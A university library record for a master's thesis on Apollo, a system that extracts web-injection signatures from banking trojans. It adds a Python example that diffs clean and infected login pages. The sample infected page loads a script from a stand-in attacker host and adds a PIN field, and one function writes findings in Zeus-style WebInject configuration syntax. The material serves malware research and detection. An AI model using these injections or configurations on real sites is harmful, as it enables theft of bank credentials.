POLITESI, Politecnico di Milano, University Library Services
Please use this identifier to cite or link to this thesis: http://hdl.handle.net/10589/122746

Date: 27-Jul-2016
Academic year: 2015/2016
Title: Apollo: eliciting and analyzing advanced WebInject-based malware
English abstract: Financial trojans, a particular kind of information-stealing malware, are among the most prevalent Internet threats. Their purpose is to commit fraudulent transactions automatically by silently stealing the bank-account credentials of users of infected machines. Their level of sophistication has grown steadily in the last few years, keeping pace with the reinforced security measures introduced by financial institutions. The attack scheme is devious: in many cases it leaves no trace of the attack, so the victim often remains unaware of the fraud for a long period. These attacks leverage API hooking techniques to install a malicious payload in the victim's browser, in order to steal user credentials or to modify web pages by inserting new content (so-called web injection). We propose an automated system, Apollo, capable of extracting web-injection signatures from financial trojans by analyzing two versions of the same visited web page, before and after the malicious injection, and identifying the portions of the original page source that trigger the malicious behavior of the malware under analysis. The system is able to elicit the malware's behavior on specified web pages as well as to extract the web-injection targets through dynamic memory inspection. We evaluated Apollo against a dataset of working financial trojan samples, showing that our method successfully extracts correct web-injection signatures together with the corresponding target URLs.
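The core step the abstract describes, comparing the clean and the injected version of one page and recording the original-page fragments around each inserted region as the signature, can be shown with a small diff-based extractor. The code below is an added example, not Apollo's own implementation from the thesis: the tokenizer, the `InjectSignature` fields, the `triggers` check and the sample pages are all assumptions made here, and the `set_url` / `data_before` / `data_inject` / `data_after` / `data_end` rendering follows the configuration syntax used by Zeus-family WebInject files, which the page itself does not describe. Hostnames in the sample use the reserved `.invalid` TLD.

```python
"""Diff-based extraction of WebInject signatures from a clean and an injected
copy of the same page. Added example; not the Apollo implementation from the
thesis. The sample pages at the bottom are constructed for the demonstration."""
import difflib
import re
from dataclasses import dataclass

# Split markup into tags and text runs so the diff works at node granularity
# (one token per tag or per text node), which keeps signatures readable.
TOKEN_RE = re.compile(r"<[^>]+>|[^<]+")


def tokenize(html):
    return TOKEN_RE.findall(html)


@dataclass
class InjectSignature:
    url: str
    kind: str          # 'insert' (content added) or 'replace' (original rewritten)
    data_before: str   # original-page tokens that precede the injection point
    data_inject: str   # content the malware put into the page
    data_after: str    # original-page tokens that follow the injection point
    removed: str = ""  # original tokens the injection replaced (empty for 'insert')


def extract_signatures(url, clean_html, infected_html, context=1):
    """Compare the clean and infected versions of one page and return one
    signature per injected region. `context` is the number of original tokens
    kept on each side as the trigger (data_before / data_after)."""
    a, b = tokenize(clean_html), tokenize(infected_html)
    sm = difflib.SequenceMatcher(a=a, b=b, autojunk=False)
    sigs = []
    for tag, i1, i2, j1, j2 in sm.get_opcodes():
        if tag not in ("insert", "replace"):
            continue  # 'delete' is content the malware hid, not an injection
        sigs.append(InjectSignature(
            url=url,
            kind=tag,
            data_before="".join(a[max(0, i1 - context):i1]),
            data_inject="".join(b[j1:j2]),
            data_after="".join(a[i2:i2 + context]),
            removed="".join(a[i1:i2]),
        ))
    return sigs


def triggers(sig, html):
    """True if `html` contains sig.data_before followed later by sig.data_after,
    i.e. the page carries the original-source fragments this injection keys on."""
    start = html.find(sig.data_before)
    if start < 0:
        return False
    return html.find(sig.data_after, start + len(sig.data_before)) >= 0


def to_webinject_config(sig):
    """Render one signature in the set_url/data_before/data_inject/data_after
    syntax used by Zeus-family WebInject files (general knowledge, assumed here)."""
    return "\n".join([
        f"set_url {sig.url}",
        "data_before", sig.data_before, "data_end",
        "data_inject", sig.data_inject, "data_end",
        "data_after", sig.data_after, "data_end",
    ])


# Constructed sample: a minimal login form, and the same page after a trojan
# added a PIN field inside the form and a script tag before </body>.
CLEAN_PAGE = ('<html><body><form action="/login"><input name="user">'
              '<input name="pass"><button>Login</button></form></body></html>')
INFECTED_PAGE = ('<html><body><form action="/login"><input name="user">'
                 '<input name="pass"><input name="pin"><button>Login</button></form>'
                 '<script src="http://attacker.invalid/inject.js"></script></body></html>')

if __name__ == "__main__":
    for s in extract_signatures("https://bank.invalid/login*", CLEAN_PAGE, INFECTED_PAGE):
        print(to_webinject_config(s), end="\n\n")
```

Running the block prints two signatures: one keyed on the password field (injecting the extra PIN input before the button) and one keyed on the closing form tag (injecting the script before `</body>`). `triggers` is the check a practitioner wants next: feeding a clean copy of another site's login page to it tells whether that page carries the same trigger fragments, which is how a signature extracted from one victim page is tested for applicability elsewhere. Increasing `context` makes signatures more specific at the cost of matching fewer page variants.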
Italian keywords (translated): financial trojans; WebInject; malware; malware analysis; MITB; man-in-the-browser; Web-injection
English keywords: financial trojans; WebInject; malware; malware analysis; MITB; man-in-the-browser; Web-injection
Language: eng
Appears in collections: POLITesi > Master's theses (Tesi Specialistiche/Magistrali)

Files in This Item:

File: Samuele Rodi - Master Thesis v2.0.pdf
Description: Master Thesis v2.0
Size: 2.87 MB
Format: Adobe PDF

